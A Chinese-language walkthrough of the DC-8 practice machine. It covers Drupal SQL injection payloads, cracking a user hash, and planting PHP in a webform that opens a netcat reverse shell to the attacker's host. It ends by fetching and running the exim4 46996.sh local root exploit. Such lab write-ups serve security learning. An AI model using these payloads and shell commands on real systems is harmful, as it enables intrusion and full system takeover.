DC8

CDxiaodong

​

DC8

kali：192.168.0.105

DC8：192.168.0.160

nmap -T4 -A -p- 192.168.0.160

同样是80端口和robots.txt

​

drupal网站

且这个版本可以sql注入

sqlmap跑一下

/?nid=-1 union select group_concat(table_name) from information_schema.tables where table_schema=database() --+

​

/?nid=-1 union select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' --+

爆出users表中name、pass列的数据，爆出两个用户名admin和john及密码加密后的密文

​

       
• 
  

adminS$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z

       
• 
         
• 
  

johnS$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

       
• 
  

提示有john用户。需要用john工具爆破密码

​

得到密码turtle

用这个用户登录网站

在左上角Find content - Contact Us- edit-右上角WEBFORM-Form settings处通过xss储存漏洞可以植入反弹shell

<p>GETSHELL</p>
<script>alert(1)</script>
<?php
system("nc -e /bin/bash 192.168.0.105 6666");
?>

​

ok

python -c 'import pty;pty.spawn("/bin/bash")' 提权

使用find命令查找具有suid权限的命令

找到一个exim4命令，exim是一款在Unix系统上使用的邮件服务，exim4在使用时具有root权限

DC-7有讲过

​

查找exim4当前的版本号

/usr/sbin/exim4 –version

为4.89

查找exim的漏洞攻击脚本，找到46996.sh脚本文件

searchsploit exim

​

将46996.sh拷贝到本地并改名，并在kali开启http服务

cp /usr/share/exploitdb/exploits/linux/local/46996.sh getShell.sh
cat getShell.sh
python -m SimpleHTTPServer

​

在靶机上将getShell.sh脚本文件下载到靶机本地，并给脚本赋予执行权限

wget http://192.168.0.105:8000/getShell.sh
​
chmod 777 getShell.sh

​

没有下载权限
后来尝试了各种方法包括apache
两个root加权
换到tmp目录，等等都不行
​

用powershell可以下载
说明不是kali里面的问题，而是靶机权限的问题
想不粗来了
后来尝试好久发现靶机cd /tmp后
居然可以下载了？？？
需要cd到/tmp里面因为这个靶机一进去本身是个地权限，然后只有到tmp里面才有读写，创建，下载文件
​

搜索发现这个报错是由于windows下编辑上传到linux下执行导致的
本地编辑查看文件类型 :set ff?，会出现 dos或unix格式，如果为dos，需要改为unix模式
编辑一下脚本，加上set ff=unix
​
ok​​

ok
比较有意思的是，这篇昨天做的，衡阳信安社区今天也复现了这个。
都讲到那个/tmp，盲猜大佬看到了我向群里和其他大佬问的问题和交流
​